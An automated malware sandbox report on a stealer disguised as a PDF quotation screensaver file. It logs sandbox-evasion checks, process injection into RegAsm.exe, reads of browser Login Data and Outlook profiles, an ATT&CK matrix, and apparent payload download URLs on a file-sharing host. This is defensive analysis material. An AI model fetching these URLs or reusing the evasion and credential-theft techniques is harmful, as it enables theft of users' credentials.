              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 7408, type: MEMORYSTR
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.000000000339C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory allocated: 1870000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory allocated: 3340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory allocated: 5340000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598141Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598032Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597907Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597782Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597657Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597516Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597407Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597282Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597157Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597032Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596922Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596813Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596688Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596563Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596438Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596313Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596180Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596077Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595951Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595844Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595719Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595610Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595485Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595360Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595235Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595110Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrWindow / User API: threadDelayed 2280Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrWindow / User API: threadDelayed 7458Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep count: 33 > 30Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7476Thread sleep count: 2280 > 30Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7476Thread sleep count: 7458 > 30Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -99875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -99766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -99656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -99547s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -99437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -99328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -99219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -99109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -99000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -98887s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -98781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -98672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -98502s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -98375s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -98265s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -98153s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -98044s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -97911s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -97797s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -97672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -97562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -598141s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -598032s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -597907s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -597782s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -597657s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -597516s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -597407s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -597282s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -597157s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -597032s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -596922s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -596813s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -596688s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -596563s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -596438s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -596313s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -596180s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -596077s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -595951s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -595844s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -595719s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -595610s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -595485s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -595360s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -595235s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 7444Thread sleep time: -595110s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99875Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99766Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99656Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99547Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99437Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99328Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99219Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99109Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99000Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98887Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98781Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98672Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98502Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98375Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98265Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98153Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98044Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 97911Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 97797Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 97672Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 97562Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598141Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598032Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597907Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597782Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597657Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597516Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597407Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597282Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597157Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597032Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596922Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596813Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596688Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596563Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596438Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596313Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596180Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596077Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595951Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595844Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595719Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595610Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595485Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595360Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595235Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595110Jump to behavior
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.000000000339C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.000000000339C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
              Source: RegAsm.exe, 00000004.00000002.2943971948.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
              Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2211270985.00000000014A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0504A3E7 LdrInitializeThunk,4_2_0504A3E7
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 448000Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 848008Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000004.00000002.2945027047.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7908, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 00000004.00000002.2945027047.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7908, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000004.00000002.2945027047.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7908, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              211
              Process Injection
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Email Collection
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              1
              Scheduled Task/Job
              31
              Virtualization/Sandbox Evasion
              LSASS Memory11
              Security Software Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              211
              Process Injection
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares1
              Data from Local System
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS31
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput Capture13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              Application Window Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              System Network Configuration Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              QUOTATION_JANQUOTE312025#U00faPDF.scr27%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://1010.filemail.com0%Avira URL Cloudsafe
              http://1010.filemail.com/api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQYXbMA-s&pk_vid=8e2aec8f065dac991739952269c1eb950%Avira URL Cloudsafe
              https://1010.filemail.com/api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQYXbMA-s&pk_vid=8e2aec8f065dac991739952269c1eb950%Avira URL Cloudsafe
              https://1010.filemail.com0%Avira URL Cloudsafe
              http://1010.filemail.com/api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQY0%Avira URL Cloudsafe
              https://1010.filemail.com/api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQ0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
